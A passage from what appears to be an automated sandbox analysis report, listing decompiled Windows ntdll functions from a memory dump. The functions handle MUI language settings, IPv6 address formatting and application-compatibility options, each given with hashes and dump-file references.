                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FC48, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00831D80, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FD5C, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00858788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00858788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00858460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0083E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0085718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00858460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0085718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00858460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00858460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00858460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0085718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0083E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00832340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0084E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0083E2A8(_t322,  &_v68, _v16);
								if(E00855553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0084E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0083E2A8(_t322,  &_v68, _t236);
								if(E00855553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0085718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0083E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00832340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0084E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0083E2A8(_v12,  &_v68, _v16);
							if(E00855553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0084E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0083E2A8(_t322,  &_v68, _t269);
							if(E00855553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0085718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0083E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00832340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0084E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0083E2A8(_v12,  &_v68, _v16);
						if(E00855553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0084E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0083E2A8(_t322,  &_v68, _t296);
						if(E00855553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0083E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                              0x00858788
                                                              0x00858788
                                                              0x00858791
                                                              0x00858794
                                                              0x00858798
                                                              0x0085879b
                                                              0x0085879e
                                                              0x008587a1
                                                              0x008587a4
                                                              0x008587a7
                                                              0x008587aa
                                                              0x008587af
                                                              0x008a1ad3
                                                              0x00858b0a
                                                              0x00858b0d
                                                              0x00858b13
                                                              0x00858b19
                                                              0x00858b1f
                                                              0x00858b25
                                                              0x00858b2b
                                                              0x00858b31
                                                              0x00858b37
                                                              0x00858b3d
                                                              0x00858b46
                                                              0x00858b46
                                                              0x008587c6
                                                              0x008587d0
                                                              0x008a1ae0
                                                              0x008a1ae6
                                                              0x008a1af8
                                                              0x008a1af8
                                                              0x008a1afd
                                                              0x008a1afe
                                                              0x008a1b01
                                                              0x008a1b06
                                                              0x008a1b06
                                                              0x008587d6
                                                              0x008587f2
                                                              0x008587f7
                                                              0x00858807
                                                              0x0085880a
                                                              0x0085880f
                                                              0x00858810
                                                              0x00858813
                                                              0x00858818
                                                              0x00858818
                                                              0x0085882c
                                                              0x00858831
                                                              0x00858838
                                                              0x00858908
                                                              0x00858920
                                                              0x008589f0
                                                              0x00858a08
                                                              0x00858af6
                                                              0x00858af6
                                                              0x00858af8
                                                              0x00858afb
                                                              0x008a1beb
                                                              0x008a1beb
                                                              0x00858b04
                                                              0x008a1bf8
                                                              0x008a1c0e
                                                              0x008a1c13
                                                              0x008a1c16
                                                              0x008a1c16
                                                              0x008a1bf8
                                                              0x00000000
                                                              0x00858b04
                                                              0x00858a0e
                                                              0x00858a11
                                                              0x00858a14
                                                              0x00858a15
                                                              0x00858a18
                                                              0x00858a22
                                                              0x00858b59
                                                              0x00858a28
                                                              0x00858a3c
                                                              0x00858a3c
                                                              0x00858a42
                                                              0x008a1bb0
                                                              0x008a1b11
                                                              0x008a1b11
                                                              0x00000000
                                                              0x00858a48
                                                              0x00858a51
                                                              0x00858a5b
                                                              0x00858a5e
                                                              0x00858a61
                                                              0x00858a69
                                                              0x00858a69
                                                              0x00858a6d
                                                              0x00000000
                                                              0x00000000
                                                              0x00858a74
                                                              0x00858a7c
                                                              0x00858a7d
                                                              0x00858a91
                                                              0x00858a93
                                                              0x00858a93
                                                              0x00858a98
                                                              0x00858a9b
                                                              0x00858aa1
                                                              0x00858aa1
                                                              0x00858aa4
                                                              0x00858aaa
                                                              0x00858ab1
                                                              0x00858ac5
                                                              0x00858ac7
                                                              0x00858ac7
                                                              0x00858ac5
                                                              0x00858ace
                                                              0x008a1bc9
                                                              0x008a1bce
                                                              0x008a1bd2
                                                              0x008a1bd2
                                                              0x00858ad8
                                                              0x00858aeb
                                                              0x00858aeb
                                                              0x00858af0
                                                              0x00858af4
                                                              0x00000000
                                                              0x00858af4
                                                              0x00858a42
                                                              0x00858926
                                                              0x00858929
                                                              0x0085892c
                                                              0x0085892d
                                                              0x00858930
                                                              0x00858935
                                                              0x0085893a
                                                              0x00858b51
                                                              0x00858940
                                                              0x00858954
                                                              0x00858954
                                                              0x0085895a
                                                              0x008a1b63
                                                              0x00000000
                                                              0x00858960
                                                              0x00858969
                                                              0x00858973
                                                              0x00858976
                                                              0x00858979
                                                              0x0085897e
                                                              0x00858981
                                                              0x00858981
                                                              0x00858986
                                                              0x00000000
                                                              0x00000000
                                                              0x008a1b6e
                                                              0x008a1b74
                                                              0x008a1b7b
                                                              0x008a1b8f
                                                              0x008a1b91
                                                              0x008a1b91
                                                              0x008a1b99
                                                              0x008a1b9c
                                                              0x008a1ba2
                                                              0x008a1ba2
                                                              0x0085898c
                                                              0x00858992
                                                              0x00858999
                                                              0x008589ad
                                                              0x008a1ba8
                                                              0x008a1ba8
                                                              0x008589ad
                                                              0x008589b6
                                                              0x008589c8
                                                              0x008589cd
                                                              0x008589d0
                                                              0x008589d0
                                                              0x008589d6
                                                              0x008589e8
                                                              0x008589e8
                                                              0x008589ed
                                                              0x00000000
                                                              0x008589ed
                                                              0x0085895a
                                                              0x0085883e
                                                              0x00858841
                                                              0x00858844
                                                              0x00858845
                                                              0x00858848
                                                              0x0085884d
                                                              0x00858852
                                                              0x00858b49
                                                              0x00858858
                                                              0x0085886c
                                                              0x0085886c
                                                              0x00858872
                                                              0x008a1b0e
                                                              0x00000000
                                                              0x00858878
                                                              0x00858881
                                                              0x0085888b
                                                              0x0085888e
                                                              0x00858891
                                                              0x00858896
                                                              0x00858899
                                                              0x00858899
                                                              0x0085889e
                                                              0x00000000
                                                              0x00000000
                                                              0x008a1b21
                                                              0x008a1b27
                                                              0x008a1b2e
                                                              0x008a1b42
                                                              0x008a1b44
                                                              0x008a1b44
                                                              0x008a1b4c
                                                              0x008a1b4f
                                                              0x008a1b55
                                                              0x008a1b55
                                                              0x008588a4
                                                              0x008588aa
                                                              0x008588b1
                                                              0x008588c5
                                                              0x008a1b5b
                                                              0x008a1b5b
                                                              0x008588c5
                                                              0x008588ce
                                                              0x008588e0
                                                              0x008588e5
                                                              0x008588e8
                                                              0x008588e8
                                                              0x008588ee
                                                              0x00858900
                                                              0x00858900
                                                              0x00858905
                                                              0x00000000
                                                              0x00858905

                                                              APIs
                                                              Strings
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00858914
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00858827
                                                              • Kernel-MUI-Number-Allowed, xrefs: 008587E6
                                                              • Kernel-MUI-Language-SKU, xrefs: 008589FC
                                                              • WindowsExcludedProcs, xrefs: 008587C1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: f73e901d0cf80c0e2dcc14feb255eb075515aa6f697546ab6620d6f7282f6382
                                                              • Instruction ID: 4d4114c47bb54634d407f2e52679bcecb76b44dcafc4e18b596e1a84872aa74c
                                                              • Opcode Fuzzy Hash: f73e901d0cf80c0e2dcc14feb255eb075515aa6f697546ab6620d6f7282f6382
                                                              • Instruction Fuzzy Hash: 68F1F5B2D00209EFDF11DF99C9819EEBBB8FF08305F14446AE905E7251EB349A45DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 38%
                                                              			E008713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00867707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x832926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00867707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x839cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00867707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00867707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00867707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00867707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                              0x008713d5
                                                              0x008713d9
                                                              0x008713dc
                                                              0x008713de
                                                              0x008713e1
                                                              0x008713e8
                                                              0x008713ee
                                                              0x0089e8fd
                                                              0x00000000
                                                              0x0089e921
                                                              0x0089e921
                                                              0x0089e928
                                                              0x0089e982
                                                              0x0089e98a
                                                              0x00000000
                                                              0x0089e99a
                                                              0x0089e99e
                                                              0x0089e9a3
                                                              0x0089e9a8
                                                              0x0089e9b9
                                                              0x0089e978
                                                              0x00000000
                                                              0x0089e978
                                                              0x0089e98a
                                                              0x0089e92a
                                                              0x0089e931
                                                              0x0089e944
                                                              0x0089e944
                                                              0x0089e950
                                                              0x0089e954
                                                              0x0089e959
                                                              0x0089e95e
                                                              0x0089e963
                                                              0x0089e970
                                                              0x00000000
                                                              0x0089e975
                                                              0x0089e93b
                                                              0x0089e980
                                                              0x00000000
                                                              0x0089e980
                                                              0x0089e942
                                                              0x0089e94b
                                                              0x00000000
                                                              0x0089e94b
                                                              0x00000000
                                                              0x0089e942
                                                              0x008713f4
                                                              0x008713f4
                                                              0x008713f9
                                                              0x008713fc
                                                              0x008713ff
                                                              0x00871406
                                                              0x0089e9cc
                                                              0x0089e9d2
                                                              0x0089e9d2
                                                              0x0089e9cc
                                                              0x0087140c
                                                              0x00871411
                                                              0x00871431
                                                              0x0087143a
                                                              0x0087143c
                                                              0x0087143f
                                                              0x0087143f
                                                              0x00871442
                                                              0x00871447
                                                              0x008714a8
                                                              0x008714ac
                                                              0x0089e9e2
                                                              0x0089e9e7
                                                              0x0089e9ec
                                                              0x0089ea05
                                                              0x0089ea05
                                                              0x00000000
                                                              0x00871449
                                                              0x00000000
                                                              0x00871449
                                                              0x0087144c
                                                              0x00871459
                                                              0x00871462
                                                              0x00871469
                                                              0x0087146a
                                                              0x00871470
                                                              0x00871473
                                                              0x00871476
                                                              0x00871476
                                                              0x00871490
                                                              0x00871495
                                                              0x0087138e
                                                              0x00871390
                                                              0x00871397
                                                              0x00871398
                                                              0x00871399
                                                              0x008713a1
                                                              0x008713a4
                                                              0x008713a4
                                                              0x00871498
                                                              0x0087149c
                                                              0x0087149f
                                                              0x008714a2
                                                              0x00000000
                                                              0x00000000
                                                              0x008714a4
                                                              0x00000000
                                                              0x008714a4
                                                              0x00871413
                                                              0x00871415
                                                              0x00871416
                                                              0x00871419
                                                              0x0087141c
                                                              0x00871422
                                                              0x008713b7
                                                              0x008713bc
                                                              0x008713bf
                                                              0x008713bf
                                                              0x008713c2
                                                              0x00871424
                                                              0x00871424
                                                              0x00871424
                                                              0x00871427
                                                              0x0087142b
                                                              0x0087142c
                                                              0x0087142c
                                                              0x0087142c
                                                              0x00000000
                                                              0x0087141c
                                                              0x00871411

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 241787ffe23edd94e9569111616403e47d54268ac1daa27e52978eb1de5fd318
                                                              • Instruction ID: 9f6f44a79d1018d67f17a93ff24902a0c50028c8762f39ee4564f0f30e7d20b4
                                                              • Opcode Fuzzy Hash: 241787ffe23edd94e9569111616403e47d54268ac1daa27e52978eb1de5fd318
                                                              • Instruction Fuzzy Hash: B96137B1900655AACF34DF5DC8848BEBBB6FF94304B18C02DE4DAC7A44D674EA40DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00867EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E00867EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x912088; // 0x776d9531
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(L00867F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					L00883F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					L0083DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x914218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					L00883F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
